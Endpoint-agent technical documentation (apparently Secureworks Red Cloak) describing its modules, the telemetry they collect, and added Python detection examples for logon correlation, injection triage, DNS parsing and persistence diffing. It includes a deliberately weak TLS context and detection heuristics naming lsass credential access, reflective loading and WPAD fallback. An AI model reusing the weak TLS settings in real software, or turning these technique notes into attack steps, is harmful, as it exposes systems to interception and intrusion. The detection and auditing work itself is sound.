Red Cloak Endpoint Agent Technical Details
This topic contains information about the Red Cloak™ Endpoint Agent and the types of information collected for the purpose of threat identification.
The Red Cloak Endpoint Agent consists of multiple modules that provide distinct functionality and features. As with any software, it is impossible to test every possible system configuration, so we recommend installing and testing the agent on several representative images within your environment before a full deployment.
Agent Overview ⫘
Windows Agent Modules ⫘
All modules are currently available for the Red Cloak Endpoint Agent for Windows. Navigate to the Module Overview section to view details for each.
Linux Agent Modules ⫘
The following modules are currently available for the Red Cloak Endpoint Agent for Linux. See the Module Overview section for the details of each module.
System Resources ⫘
- The agent typically runs with Low CPU Priority.
- The agent consumes < 5MB of network bandwidth per day.
- The agent on average consumes less than 100MB of RAM, with a working limit of 600MB.
- The agent is limited to 300MB of disk space by default. Reaching this limit is rare and in most cases means the host has been unable to check in and upload its data; when it happens, the oldest data is overwritten by new data.
The disk usage limit is configurable, but we recommend leaving the default configuration. You can also disable certain modules as part of the build process or by working with Product Support to use a host command for configuration changes, but Secureworks recommends leaving all modules enabled to provide the highest level of visibility and detection capabilities.
Network Connectivity ⫘
The Red Cloak Endpoint Agent communicates with the cluster over port 443 using TLS v1.2 with a strong cipher suite. By default, the agent checks in every 20 minutes and keeps the connection alive for ten minutes. Known vulnerabilities in SSL/TLS are either not applicable to Red Cloak Endpoint Agent or are mitigated through the following:
- Insecure renegotiation — the agent supports only secure renegotiation (RFC 5746), with a strong cipher suite.
- SSL version downgrade — SSLv2 (DROWN) and SSLv3 (POODLE) are not supported and are therefore not available as downgrade targets.
- Weak and export-grade cipher suites (e.g. the export RSA suites abused by FREAK, RC4) — not supported and therefore not available as downgrade targets.
- Attacks against compression (CRIME, BREACH) — these exploit compression rather than a weakness of a particular protocol version, so they apply to all versions of TLS (and to other protocols) and are not addressed by version selection alone.
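The properties listed above (TLS 1.2 minimum, no SSLv2/SSLv3, no RC4 or export suites, compression-based attacks kept out of scope) are easy to state and easy to lose in a client library's defaults. The following Python is an added example, not agent code: it builds a client TLS context with an assumed equivalent of that posture, a deliberately permissive counterpart, and an audit function that reports where a context falls short. Nothing here reflects the agent's real configuration; the marker list and the hardened cipher string are the example's own choices.

```python
"""Audit a client-side TLS policy for the properties described above.

Added example, not agent code: the hardened context is an assumed equivalent
of the stated posture, not the agent's actual configuration.
"""
import ssl

# Name fragments of suites that must never be offered: RC4, DES/3DES, export
# grade, NULL encryption/auth, MD5 MACs, anonymous key exchange.
WEAK_SUITE_MARKERS = ("RC4", "DES", "NULL", "EXP", "MD5", "ADH", "AECDH")


def audit_context(ctx: ssl.SSLContext) -> list:
    """Return a list of findings; an empty list means the policy passes."""
    findings = []
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append(
            f"minimum protocol version is {ctx.minimum_version.name}; expected TLSv1_2"
        )
    if not (ctx.options & ssl.OP_NO_COMPRESSION):
        findings.append("TLS compression not disabled (CRIME exposure)")
    for suite in ctx.get_ciphers():
        name = suite["name"]
        if any(m in name for m in WEAK_SUITE_MARKERS) or suite["strength_bits"] < 128:
            findings.append(f"weak cipher suite enabled: {name}")
    return findings


def hardened_client_context() -> ssl.SSLContext:
    """TLS 1.2 minimum, compression off, ECDHE + AEAD suites only."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)  # cert and hostname checks on by default
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.options |= ssl.OP_NO_COMPRESSION
    ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:!aNULL:!eNULL:!MD5:!RC4")
    return ctx


def permissive_client_context() -> ssl.SSLContext:
    """Deliberately weak counterpart: oldest version the library allows,
    every suite it knows, compression negotiable again."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
    ctx.options = int(ctx.options) & ~int(ssl.OP_NO_COMPRESSION)
    ctx.set_ciphers("ALL")
    return ctx


if __name__ == "__main__":
    for label, ctx in (("hardened", hardened_client_context()),
                       ("permissive", permissive_client_context())):
        print(f"{label}: {audit_context(ctx) or 'OK'}")
```

On a modern OpenSSL build the permissive context may show only the protocol-version and compression findings, because RC4 and export suites are no longer compiled in; on an older library the cipher findings appear as well, which is exactly the kind of platform drift the audit is meant to catch.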
Open Source Software ⫘
The Red Cloak Endpoint Agent makes use of open source software. The following is a list of the open source packages used and where to download the software.
Module Overview ⫘
AuthTap Module ⫘
The AuthTap module is designed to capture all events related to authentication of users and the explicit use of credentials on a host. While the module is capable of capturing other Windows events, this is generally only used in specific Targeted Threat Hunt situations. In addition, the module is capable of capturing past events from the system, which is useful for looking at historical Windows event log data.
By default, the AuthTap module of the most recent agent version captures the following Windows Events:
Windows Event ID | Description |
---|---|
21 | Remote Desktop Services: Session logon succeeded |
22 | Remote Desktop Services: Shell start notification received |
104 | The Application log file was cleared |
106 | A Task Scheduler task was registered (logged when a user registers a task) |
141 | A Task Scheduler task was deleted (logged when a user deletes a task) |
1102 | The audit log was cleared |
1104 | The security log is now full |
4624 | An account was successfully logged on |
4625 | An account failed to log on |
4648 | A logon was attempted using explicit credentials |
4672 | Special privileges assigned to new logon |
4720 | A user account was created |
4722 | A user account was enabled |
4724 | An attempt was made to reset an account’s password |
4725 | A user account was disabled |
4726 | A user account was deleted |
4728 | A member was added to a security-enabled global group |
4732 | A member was added to a security-enabled local group |
4735 | A security-enabled local group was changed |
4738 | A user account was changed |
4739 | Domain Policy was changed |
4740 | A user account was locked out |
4742 | A computer account was changed |
4756 | A member was added to a security-enabled universal group |
4768 | A Kerberos authentication ticket (TGT) was requested (Logged on domain controllers) |
4769 | A Kerberos service ticket was requested |
4770 | A Kerberos service ticket was renewed |
4771 | Kerberos pre-authentication failed |
4776 | The domain controller attempted to validate the credentials for an account |
4777 | The domain controller failed to validate the credentials for an account |
4794 | An attempt was made to set the Directory Services Restore Mode administrator password |
In addition, the following data fields are collected from the events:
- Subject User Name
- Subject Domain Name
- Subject Logon ID
- Target User Name
- Target Domain Name
- Target Logon ID
- Logon Type
- Logon Process Name
- Authentication Package Name
- Privilege List
- Sam Account Name
- User Principal Name
- Home Directory
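Once AuthTap events are normalized to the fields above, the useful work is correlation across them rather than matching on a single ID. The following Python is an added example, not agent or platform code: it runs four hunting rules over constructed sample records whose keys are the listed fields in snake_case (a failed-logon burst, explicit credential use for a different account, an account created and then a group changed by the same logon session, and audit-log clearing). Thresholds, windows and rule names are the example's own.

```python
"""Correlation rules over AuthTap-style Windows security events (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events, not real telemetry. Keys mirror the AuthTap fields
# (Subject/Target User Name, Subject Logon ID, Logon Type) in snake_case.
SAMPLE_EVENTS = [
    {"ts": "2018-10-18T15:20:00", "event_id": 4625, "subject_user": "-", "subject_logon_id": "0x3e7",
     "target_user": "Administrator", "target_domain": "WS01", "logon_type": 3},
    {"ts": "2018-10-18T15:20:05", "event_id": 4625, "subject_user": "-", "subject_logon_id": "0x3e7",
     "target_user": "Administrator", "target_domain": "WS01", "logon_type": 3},
    {"ts": "2018-10-18T15:20:10", "event_id": 4625, "subject_user": "-", "subject_logon_id": "0x3e7",
     "target_user": "Administrator", "target_domain": "WS01", "logon_type": 3},
    {"ts": "2018-10-18T15:30:00", "event_id": 4648, "subject_user": "jdoe", "subject_logon_id": "0x3e7a1",
     "target_user": "svc_backup", "target_domain": "CORP", "logon_type": None},
    {"ts": "2018-10-18T15:30:02", "event_id": 4624, "subject_user": "jdoe", "subject_logon_id": "0x3e7a1",
     "target_user": "svc_backup", "target_domain": "CORP", "logon_type": 10},  # 10 = RemoteInteractive
    {"ts": "2018-10-18T15:31:00", "event_id": 4720, "subject_user": "svc_backup", "subject_logon_id": "0x51c2e",
     "target_user": "support1", "target_domain": "WS01", "logon_type": None},
    {"ts": "2018-10-18T15:31:10", "event_id": 4732, "subject_user": "svc_backup", "subject_logon_id": "0x51c2e",
     "target_user": "Administrators", "target_domain": "Builtin", "logon_type": None},
    {"ts": "2018-10-18T15:35:00", "event_id": 1102, "subject_user": "svc_backup", "subject_logon_id": "0x51c2e",
     "target_user": None, "target_domain": None, "logon_type": None},
]

WINDOW = timedelta(minutes=5)
FAILED_LOGON_THRESHOLD = 3


def correlate(events, window=WINDOW, failed_threshold=FAILED_LOGON_THRESHOLD):
    """Return (rule, detail, timestamp) tuples for the sequences worth a look."""
    alerts = []
    created_by_session = defaultdict(list)  # Subject Logon ID -> [(ts, new account)]
    failures = defaultdict(list)            # Target User Name -> [ts of each 4625]
    for e in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(e["ts"])
        eid = e["event_id"]
        if eid in (1102, 104):
            # Log clearing is always worth an alert; the subject is who cleared it.
            alerts.append(("audit_log_cleared", e["subject_user"], e["ts"]))
        elif eid == 4648 and (e["target_user"] or "").lower() != e["subject_user"].lower():
            # Explicit credentials for a different account: runas or lateral movement.
            alerts.append(("explicit_credentials",
                           f'{e["subject_user"]} -> {e["target_domain"]}\\{e["target_user"]}', e["ts"]))
        elif eid == 4720:
            created_by_session[e["subject_logon_id"]].append((ts, e["target_user"]))
        elif eid in (4728, 4732, 4756):
            # The same logon session created an account and changed a group shortly after.
            for created_ts, account in created_by_session.get(e["subject_logon_id"], []):
                if ts - created_ts <= window:
                    alerts.append(("new_account_then_group_change",
                                   f'{account} / {e["target_user"]}', e["ts"]))
        elif eid == 4625:
            hits = failures[e["target_user"]]
            hits.append(ts)
            recent = [t for t in hits if ts - t <= window]
            if len(recent) == failed_threshold:  # fire once, when the threshold is crossed
                alerts.append(("failed_logon_burst", e["target_user"], e["ts"]))
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(*alert)
```

The group-change rule keys on Subject Logon ID rather than on user name on purpose: it ties the two events to one logon session, which survives account renames and is the field the agent collects for exactly this kind of join.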
Cyclorama Module ⫘
The Cyclorama module monitors thread injection events and collects information about each injection. When a remote thread is created, Cyclorama attempts to read the first 256 bytes at the new thread's start address; the event is dropped at the server if it carries no start bytes or if all 256 bytes are null. The one exception is a target process whose name contains lsass: those events are never dropped, because every injection attempt against lsass should be recorded. The Cyclorama module collects the following information:
- Source Process Create Time
- Source Process ID
- Source Process Name
- Target Process Create Time
- Target Process ID
- Target Process Name
- Thread ID
- Thread Start Address
- Thread Start Mapping Path
- Thread Start Bytes
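The server-side drop rule above has an edge case that is easy to get backwards (all-null bytes are dropped, but not for lsass), and the fields that survive it are what an analyst triages. The following Python is an added example, not platform code: it implements the drop rule as described and adds a small first-pass triage over the collected fields (unbacked start address, MZ-prefixed start bytes, lsass target). The events are constructed, with the listed fields in snake_case, and the triage heuristics are the example's own.

```python
"""Server-side handling of Cyclorama thread injection events (added example).

Implements the drop rule described above and adds a small triage pass; the
event dicts are constructed here, with the listed fields in snake_case.
"""

START_BYTES_LEN = 256


def should_drop(event: dict) -> bool:
    """Drop when no start bytes were captured or all captured bytes are null,
    unless the target process name contains 'lsass'."""
    if "lsass" in (event.get("target_process_name") or "").lower():
        return False
    raw = event.get("thread_start_bytes") or ""
    data = bytes.fromhex(raw)[:START_BYTES_LEN]
    return len(data) == 0 or not any(data)


def triage(event: dict) -> list:
    """Heuristic labels for events that survive the filter (example heuristics)."""
    reasons = []
    if not event.get("thread_start_mapping_path"):
        # A start address with no backing image is the classic shape of injected shellcode.
        reasons.append("thread start address is not backed by a mapped image")
    data = bytes.fromhex(event.get("thread_start_bytes") or "")
    if data[:2] == b"MZ":
        # On x64 the bytes 4D 5A decode to `pop r10`, so a PE can be started at its
        # own header: the pattern of reflective loaders that run the image from base.
        reasons.append("start bytes begin with an MZ header (reflective loader pattern)")
    elif data[:1] in (b"\xe8", b"\xe9"):
        reasons.append("start bytes begin with call/jmp (position-independent stub)")
    if "lsass" in (event.get("target_process_name") or "").lower():
        reasons.append("target is lsass (credential access)")
    return reasons


# Constructed samples: an all-null capture, an all-null capture into lsass, and
# an unbacked MZ-prefixed start in a user process.
SAMPLES = [
    {"source_process_name": "svchost.exe", "target_process_name": "explorer.exe",
     "thread_start_mapping_path": r"C:\Windows\System32\ntdll.dll",
     "thread_start_bytes": "00" * START_BYTES_LEN},
    {"source_process_name": "updater.exe", "target_process_name": "lsass.exe",
     "thread_start_mapping_path": "", "thread_start_bytes": "00" * START_BYTES_LEN},
    {"source_process_name": "updater.exe", "target_process_name": "notepad.exe",
     "thread_start_mapping_path": "",
     "thread_start_bytes": "4d5ae8000000005b" + "90" * (START_BYTES_LEN - 8)},
]


def process(events) -> list:
    """Return [(target name, triage reasons)] for the events kept after filtering."""
    return [(e["target_process_name"], triage(e)) for e in events if not should_drop(e)]


if __name__ == "__main__":
    for name, reasons in process(SAMPLES):
        print(name, reasons)
```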
Entwine Module ⫘
The Entwine module collects Event Tracing for Windows (ETW) events. ETW is a rich source of data on Windows: operating-system components and applications that contain event tracing instrumentation publish events through providers. Entwine subscribes to those providers and reports the events as JSON to the Red Cloak Endpoint Agent, supporting advanced threat hunting by allowing early identification of suspicious and malicious behavior. More information on ETW can be found here: https://docs.microsoft.com/en-us/windows/desktop/etw/about-event-tracing.
The module currently monitors DNS, with support for configuring other user-mode and kernel-mode ETW providers planned. The providers that Entwine subscribes to are defined in config.bin. Entwine also supports filtering by event ID per provider, as described for DNS monitoring in the following section.
Supported Platforms: Entwine runs only on endpoints running Windows 7 or later.
ETW DNS Monitoring ⫘
ETW Provider for DNS Query Events ⫘
- Microsoft-Windows-DNS-Client
- {1C95126E-7EEA-49A9-A3FE-A378B03DDB4D}
Events of Interest ⫘
- Event ID — 1015
- Event Message — Name resolution for the name %1 timed out after the DNS server did not respond.
- Example Event — Name resolution timeout (1015)
```json
{
  "allowed_domain": [
    "62e1ad52"
  ],
  "chan_name": "Microsoft-Windows-DNS Client Events/Operational ",
  "color": "UNKNOWN",
  "event_data": [
    {
      "data": "client.wns.windows.com",
      "name": "QueryName"
    },
    {
      "data": "16",
      "name": "AddressLength"
    },
    {
      "data": "10.0.0.254:53",
      "name": "Address"
    }
  ],
  "event_id": 1015,
  "event_info": {
    "dns_query_name": "client.wns.windows.com"
  },
  "event_msg": "Name resolution for the name client.wns.windows.com timed out after the DNS server 10.0.0.254:53 did not respond. ",
  "id": {
    "host_id": "62e1ad528d83dae27f9d270b5517d985",
    "instance_id": "fed5fc2a-e56c-4252-a8f4-c852a1d07914"
  },
  "keyword": "0x8000000000000000",
  "level": 4,
  "pid": 1216,
  "provider_guid": "{1C95126E-7EEA-49A9-A3FE-A378B03DDB4D}",
  "provider_name": "Microsoft-Windows-DNS-Client",
  "task": 1015,
  "tid": 3248,
  "timestamp": "2018-10-18T15:31:22.331081"
}
```
- Event ID — 1016
- Event Message — A name not found error was returned for the name %1. Check to ensure that the name is correct. The response was sent by the server at %3.
- Example Event — Name not found error (1016)
```json
{
  "allowed_domain": [
    "62e1ad52"
  ],
  "chan_name": "Microsoft-Windows-DNS Client Events/Operational ",
  "color": "UNKNOWN",
  "event_data": [
    {
      "data": "wpad.test.net",
      "name": "QueryName"
    },
    {
      "data": "16",
      "name": "AddressLength"
    },
    {
      "data": "10.0.0.254:53",
      "name": "Address"
    }
  ],
  "event_id": 1016,
  "event_info": {
    "dns_query_name": "wpad.test.net"
  },
  "event_msg": "A name not found error was returned for the name wpad.test.net. Check to ensure that the name is correct. The response was sent by the server at 10.0.0.254:53. ",
  "id": {
    "host_id": "62e1ad528d83dae27f9d270b5517d985",
    "instance_id": "25368a70-ce64-4f5d-9699-9d771d3519e5"
  },
  "keyword": "0x8000000000000000",
  "level": 4,
  "pid": 1216,
  "provider_guid": "{1C95126E-7EEA-49A9-A3FE-A378B03DDB4D}",
  "provider_name": "Microsoft-Windows-DNS-Client",
  "task": 1016,
  "tid": 6560,
  "timestamp": "2018-10-18T14:43:23.524524"
}
```
- Event ID — 3018
- Event Message — Cache lookup for name %1, type %2 and option %3 returned %4 with results %5
- Example Event — Cache lookup (3018)
```json
{
  "allowed_domain": [
    "62e1ad52"
  ],
  "chan_name": "Microsoft-Windows-DNS Client Events/Operational ",
  "color": "UNKNOWN",
  "event_data": [
    {
      "data": "v10.vortex-win.data.microsoft.com",
      "name": "QueryName"
    },
    {
      "data": "28",
      "name": "QueryType"
    },
    {
      "data": "2251800888107008",
      "name": "QueryOptions"
    },
    {
      "data": "9701",
      "name": "Status"
    },
    {
      "name": "QueryResults"
    }
  ],
  "event_id": 3018,
  "event_info": {
    "dns_query_name": "v10.vortex-win.data.microsoft.com",
    "dns_query_result": ""
  },
  "event_msg": "Cache lookup for name v10.vortex-win.data.microsoft.com, type 28 and option 2251800888107008 returned 9701 with results ",
  "id": {
    "host_id": "62e1ad528d83dae27f9d270b5517d985",
    "instance_id": "9934e99c-66c6-4148-af94-0229facb9580"
  },
  "keyword": "0x8000000000000000",
  "level": 4,
  "pid": 1216,
  "provider_guid": "{1C95126E-7EEA-49A9-A3FE-A378B03DDB4D}",
  "provider_name": "Microsoft-Windows-DNS-Client",
  "tid": 3248,
  "timestamp": "2018-10-18T15:10:19.099102"
}
```
- Event ID — 3020
- Event Message — Query response for name %1, type %2, interface index %3 and network index %4 returned %5 with results %6
- Example Event — Query Response (3020)
```json
{
  "allowed_domain": [
    "62e1ad52"
  ],
  "chan_name": "Microsoft-Windows-DNS Client Events/Operational ",
  "color": "UNKNOWN",
  "event_data": [
    {
      "data": "cluster.rcdaily.cloudops.ctudev.com",
      "name": "QueryName"
    },
    {
      "data": "1",
      "name": "QueryType"
    },
    {
      "data": "0",
      "name": "NetworkIndex"
    },
    {
      "data": "0",
      "name": "InterfaceIndex"
    },
    {
      "data": "0",
      "name": "Status"
    },
    {
      "data": "34.238.81.39;type: 2 ns-1883.awsdns-43.co.uk;type: 2 ns-139.awsdns-17.com;type: 2 ns-646.awsdns-16.net;type: 2 ns-1175.awsdns-18.org;205.251.192.139;2600:9000:5300:8b00::1;205.251.194.134;2600:9000:5302:8600::1;205.251.196.151;2600:9000:5304:9700::1;205.251.199.91;2600:9000:5307:5b00::1;",
      "name": "QueryResults"
    }
  ],
  "event_id": 3020,
  "event_info": {
    "dns_query_name": "cluster.rcdaily.cloudops.ctudev.com",
    "dns_query_result": "34.238.81.39;type: 2 ns-1883.awsdns-43.co.uk;type: 2 ns-139.awsdns-17.com;type: 2 ns-646.awsdns-16.net;type: 2 ns-1175.awsdns-18.org;205.251.192.139;2600:9000:5300:8b00::1;205.251.194.134;2600:9000:5302:8600::1;205.251.196.151;2600:9000:5304:9700::1;205.251.199.91;2600:9000:5307:5b00::1;"
  },
  "event_msg": "Query response for name cluster.rcdaily.cloudops.ctudev.com, type 1, interface index 0 and network index 0 returned 0 with results 34.238.81.39;type: 2 ns-1883.awsdns-43.co.uk;type: 2 ns-139.awsdns-17.com;type: 2 ns-646.awsdns-16.net;type: 2 ns-1175.awsdns-18.org;205.251.192.139;2600:9000:5300:8b00::1;205.251.194.134;2600:9000:5302:8600::1;205.251.196.151;2600:9000:5304:9700::1;205.251.199.91;2600:9000:5307:5b00::1; ",
  "id": {
    "host_id": "62e1ad528d83dae27f9d270b5517d985",
    "instance_id": "c5d19822-8854-494d-ad89-f3dc7bde1e29"
  },
  "keyword": "0x8000000000000000",
  "level": 4,
  "pid": 1216,
  "provider_guid": "{1C95126E-7EEA-49A9-A3FE-A378B03DDB4D}",
  "provider_name": "Microsoft-Windows-DNS-Client",
  "tid": 3248,
  "timestamp": "2018-10-18T15:34:58.885911"
}
```
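The four event shapes above share a structure (a positional event_data list plus a flattened event_info) but differ in which fields are present, and the 3020 QueryResults string packs several record types into one semicolon-delimited value. The following Python is an added example, not agent or platform code: it normalizes an Entwine DNS event into a flat record, splits QueryResults into typed (rtype, value) pairs, and applies two triage heuristics (a WPAD name that is not found in DNS, and a resolver timeout). The sample events are abridged from the examples above; the status and RR-type tables are the example's own.

```python
"""Parse and triage Entwine DNS events in the JSON shape shown above.

Added example, not agent or platform code. Status and RR-type tables are the
example's own; the sample events are abridged from the examples above.
"""
import ipaddress
import json

# Win32 DNS status values that appear in the Status field of 3018/3020 events.
DNS_STATUS = {0: "SUCCESS", 9003: "DNS_ERROR_RCODE_NAME_ERROR", 9701: "DNS_INFO_NO_RECORDS"}
# RR type numbers used by the "type: N name" entries in QueryResults.
RR_TYPES = {2: "NS", 5: "CNAME", 15: "MX", 16: "TXT", 33: "SRV"}


def parse_query_results(results: str) -> list:
    """Split the semicolon-delimited QueryResults string into (rtype, value) pairs.

    Bare IPv4/IPv6 addresses are A/AAAA answers; other records are written as
    "type: N value" and carry their RR type explicitly.
    """
    records = []
    for item in results.split(";"):
        item = item.strip()
        if not item:
            continue
        if item.startswith("type:"):
            _, num, value = item.split(None, 2)
            records.append((RR_TYPES.get(int(num), f"TYPE{num}"), value))
        else:
            family = ipaddress.ip_address(item).version
            records.append(("A" if family == 4 else "AAAA", item))
    return records


def normalize(event: dict) -> dict:
    """Flatten one Entwine event into the fields a hunt query needs."""
    data = {d["name"]: d.get("data", "") for d in event.get("event_data", [])}
    status = int(data["Status"]) if data.get("Status") else None
    return {
        "timestamp": event["timestamp"],
        "event_id": event["event_id"],
        "pid": event["pid"],
        "query_name": event["event_info"]["dns_query_name"],
        "query_type": int(data["QueryType"]) if data.get("QueryType") else None,
        "server": data.get("Address"),
        "status": status,
        "status_name": DNS_STATUS.get(status, str(status)),
        "results": parse_query_results(event["event_info"].get("dns_query_result", "")),
    }


def triage(rec: dict) -> list:
    """Example heuristics over a normalized record."""
    reasons = []
    if rec["event_id"] == 1016 and rec["query_name"].lower().split(".")[0] == "wpad":
        # An NXDOMAIN for WPAD leaves the client free to fall back to LLMNR/NBT-NS,
        # where anyone on the segment can answer the name and proxy its traffic.
        reasons.append("WPAD name not found in DNS: LLMNR/NBT-NS fallback exposure")
    if rec["event_id"] == 1015:
        reasons.append(f"resolver {rec['server']} timed out")
    return reasons


# Abridged from the 1016, 3018 and 3020 examples above (unrelated keys dropped).
SAMPLE_EVENTS = json.loads('''[
  {"event_id": 1016, "pid": 1216, "timestamp": "2018-10-18T14:43:23.524524",
   "event_data": [{"data": "wpad.test.net", "name": "QueryName"},
                  {"data": "16", "name": "AddressLength"},
                  {"data": "10.0.0.254:53", "name": "Address"}],
   "event_info": {"dns_query_name": "wpad.test.net"}},
  {"event_id": 3018, "pid": 1216, "timestamp": "2018-10-18T15:10:19.099102",
   "event_data": [{"data": "v10.vortex-win.data.microsoft.com", "name": "QueryName"},
                  {"data": "28", "name": "QueryType"}, {"data": "9701", "name": "Status"},
                  {"name": "QueryResults"}],
   "event_info": {"dns_query_name": "v10.vortex-win.data.microsoft.com", "dns_query_result": ""}},
  {"event_id": 3020, "pid": 1216, "timestamp": "2018-10-18T15:34:58.885911",
   "event_data": [{"data": "cluster.rcdaily.cloudops.ctudev.com", "name": "QueryName"},
                  {"data": "1", "name": "QueryType"}, {"data": "0", "name": "Status"}],
   "event_info": {"dns_query_name": "cluster.rcdaily.cloudops.ctudev.com",
                  "dns_query_result": "34.238.81.39;type: 2 ns-1883.awsdns-43.co.uk;type: 2 ns-139.awsdns-17.com;type: 2 ns-646.awsdns-16.net;type: 2 ns-1175.awsdns-18.org;205.251.192.139;2600:9000:5300:8b00::1;205.251.194.134;2600:9000:5302:8600::1;205.251.196.151;2600:9000:5304:9700::1;205.251.199.91;2600:9000:5307:5b00::1;"}}
]''')


def run(events) -> list:
    """Return (query name, status name, triage reasons) per event."""
    out = []
    for event in events:
        rec = normalize(event)
        out.append((rec["query_name"], rec["status_name"], triage(rec)))
    return out


if __name__ == "__main__":
    for row in run(SAMPLE_EVENTS):
        print(row)
```

Note that event_data entries can lack a data key (the 3018 QueryResults entry above), so the normalizer defaults missing values to an empty string rather than indexing directly.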
Groundling Module ⫘
Upon installation, the Groundling module captures all persistent programs and then monitors persistence locations for modifications. When a persistence change is detected, the agent collects information related to the change and sends a message to the Red Cloak Endpoint Agent cluster. The Groundling module collects the following types of information (the list is abbreviated because of its size).
Program Information ⫘
- Creation Time
- Last Access Time
- Last Write Time
- Calculated MD5 Hash
- Native Path
- Path
- Path Context
- Calculated SHA1 Hash
- Calculated SHA256 Hash
- Size
- Version Comments
- Company Name
- File Description
- File Version
- Internal Name
- Legal Copyright
- Original File Name
- Product Name
- Product Version
Signature Information ⫘
- Signature Hash
- Signature Issuer Name
- Signature More Info Link
- Signature Program Name
- Signature Publisher Link
- Signature Serial Number
- Signature Subject Name
Registry Information ⫘
- Registry Value Name
- Registry Value
- Value Dword
- Key Path
- Key Root
- User Registry SID
Service Information ⫘
- Description
- Display Name
- Image Path
- Name
- Service DLL
- Service Main
- Start Type
- Status
- Type
Scheduled Task Information ⫘
- Scheduled Task File Information
- Last Run Time
- Working Directory
- Enabled
- Next Run Time
- Task Name
- Etc.
Shortcut Information ⫘
- Description
- File Information
- Creation Time
- File Attributes
- Target Path
- Target Size
- Etc.
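The value of collecting path, hashes and signature details together is that a change can be classified rather than merely noticed: a value retargeted to a new file, a binary replaced in place, and a signer that disappeared are different findings with different urgency. The following Python is an added example, not agent code: it diff-checks two constructed persistence snapshots keyed by (key path, value name) using the Program, Registry and Signature fields listed above, and ranks each change. The snapshots and the change categories are the example's own.

```python
"""Baseline-and-diff over persistence entries using the fields Groundling collects.

Added example, not agent code: the snapshots are constructed dicts and the
change categories are the example's own.
"""

# (key path, value name) -> collected details, following the lists above.
BASELINE = {
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth"): {
        "path": r"C:\Windows\System32\SecurityHealthSystray.exe", "size": 122880,
        "sha256": "a1" * 32, "signature_subject_name": "Microsoft Windows"},
    (r"HKLM\System\CurrentControlSet\Services\Spooler", "ImagePath"): {
        "path": r"C:\Windows\System32\spoolsv.exe", "size": 823296,
        "sha256": "b2" * 32, "signature_subject_name": "Microsoft Windows"},
}
# Later snapshot: Run value retargeted to an unsigned copy, spooler binary
# replaced in place by a signed build, and a new AppInit_DLLs entry.
CURRENT = {
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth"): {
        "path": r"C:\Users\Public\SecurityHealthSystray.exe", "size": 61440,
        "sha256": "c3" * 32, "signature_subject_name": ""},
    (r"HKLM\System\CurrentControlSet\Services\Spooler", "ImagePath"): {
        "path": r"C:\Windows\System32\spoolsv.exe", "size": 823296,
        "sha256": "d4" * 32, "signature_subject_name": "Microsoft Windows"},
    (r"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows", "AppInit_DLLs"): {
        "path": r"C:\ProgramData\helper.dll", "size": 20480,
        "sha256": "e5" * 32, "signature_subject_name": ""},
}


def diff_persistence(baseline: dict, current: dict) -> list:
    """Return (change, (key path, value name), detail) for every difference."""
    changes = []
    for key in sorted(set(baseline) | set(current)):
        old, new = baseline.get(key), current.get(key)
        if old is None:
            changes.append(("added", key, new["path"]))
            continue
        if new is None:
            changes.append(("removed", key, old["path"]))
            continue
        if old["path"] != new["path"]:
            changes.append(("target_changed", key, f'{old["path"]} -> {new["path"]}'))
        elif old["sha256"] != new["sha256"]:
            # Same path, new hash: the file itself was swapped (patch or tamper).
            changes.append(("binary_replaced", key, new["sha256"][:16]))
        if old["signature_subject_name"] != new["signature_subject_name"]:
            changes.append(("signer_changed", key,
                            f'{old["signature_subject_name"] or "(unsigned)"} -> '
                            f'{new["signature_subject_name"] or "(unsigned)"}'))
    return changes


def severity(change: tuple) -> str:
    """Hash churn under an unchanged signer is usually patching; anything that
    adds an entry, moves a target, or drops a signer deserves a look."""
    kind, _, detail = change
    if kind == "signer_changed" and detail.endswith("(unsigned)"):
        return "high"
    if kind in ("added", "target_changed"):
        return "high"
    if kind == "binary_replaced":
        return "low"
    return "medium"


if __name__ == "__main__":
    for change in diff_persistence(BASELINE, CURRENT):
        print(severity(change), *change)
```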
The following are examples of locations monitored for persistence changes; the full list can be viewed in the Appendix.
Registry keys ⫘
- AppInit DLLs (e.g. HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows)
- Boot execute (e.g. HKLM\SYSTEM\CurrentControlSet\Control\Session)
- Codecs (e.g. HKCU\Software\Microsoft\Windows NT\CurrentVersion\Drivers32)
- Drivers (e.g. HKLM\SYSTEM\CurrentControlSet\Control)
- Explorer (e.g. HKCU\SOFTWARE\Classes\Protocols\Filter)
- Image hijacks (e.g. HKLM\SOFTWARE\Classes\Exefile\Shell\Open\Command)
- Internet Explorer (e.g. HKLM\Software\Wow6432Node\Microsoft\Internet)
- Known DLLs (e.g. HKLM\System\CurrentControlSet\Control\Session)
- Logon (e.g. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit)
- LSA Providers (e.g. HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages)
- Network providers (e.g. HKLM\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order)
- Print Monitors (e.g. HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors)
- Services (e.g. HKLM\System\CurrentControlSet\Services)
- Winsock Providers (e.g. HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries)
- Winlogon (e.g. HKLM\SYSTEM\Setup\CmdLine)
Program locations ⫘
- Sidebar gadgets
Scheduled tasks ⫘
- We use the task scheduler API to enumerate tasks
Configuration Settings ⫘
Red Cloak Endpoint Agent prevents external scripts from removing Windows domain user profiles, as the Groundling and Inspector™ modules load profiles for monitoring. To allow external scripts to remove domain user profiles, work with Product Support to alter the Windows Profile loading pattern for Groundling and Inspector™ via Host Command. The default value for Groundling is Always, with Always and Smart as recommended.
Setting | Value | Description |
---|---|---|
groundling.profile_load | Always | Groundling loads all profiles upon startup and never unloads them |
